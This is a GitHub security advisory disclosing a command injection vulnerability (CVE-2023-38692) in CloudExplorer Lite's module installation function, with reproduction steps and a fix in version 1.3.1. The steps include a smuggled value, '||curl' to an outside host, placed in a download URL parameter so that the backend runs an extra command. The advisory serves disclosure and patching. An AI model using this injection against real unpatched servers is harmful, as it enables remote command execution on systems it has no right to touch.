Skip to content

Command injection vulnerability in module management function in CloudExplorer Lite

Moderate
baixin513 published GHSA-7wrc-f42m-9v5w Aug 3, 2023

Package

maven com.fit2cloud (Maven)

Affected versions

versions: <= 1.3.0

Patched versions

1.3.1

Description

Impact

Command injection vulnerability in installation function in module management.

The reproduction steps are as follows:

  1. Installation function in module management: Install method in ModuleManageController. The address is as follows: https://github.com/CloudExplorer-Dev/CloudExplorer-Lite/blob/v1.3.0/framework/management-center/backend/src/main/java/com/fit2cloud/controller/ModuleManageController.java

image

  1. Download the installation package from the specified URL using the updateModule function in run core. sh to complete the installation.

image

image

  1. The updateModule function in run core. sh is as follows. Due to the unfiltered URL, the following string can be passed in to cause command injection.

||Curl http://wwww.aa.com

  1. Finally, the updateModule will execute the following command:

Curl - SL | | curl http://wwww.aa.com -O/opt/cloudexplorer/downloads/$_ File | | exit 1

image

  1. Call this interface to download_ URL parameter passed in | | curl http://wwww.aa.com , have the backend host execute curl http://wwww.aa.com , set here http://wwww.aa.com Is the dnslog address.
    image

  2. After sending the request, dnslog successfully accepted the request, proving that the backend host successfully executed the command curl http://wwww.aa.com

image

Affected versions: <= 1.3.0.

Patches

The vulnerability has been fixed in v1.3.1.

Workarounds

It is recommended to upgrade the version to v1.3.1.

References

If you have any questions or comments about this advisory:

Open an issue in https://github.com/CloudExplorer-Dev/CloudExplorer-Lite
Email us at xin.bai@fit2cloud.com

Severity

Moderate

CVE ID

CVE-2023-38692

Weaknesses

Credits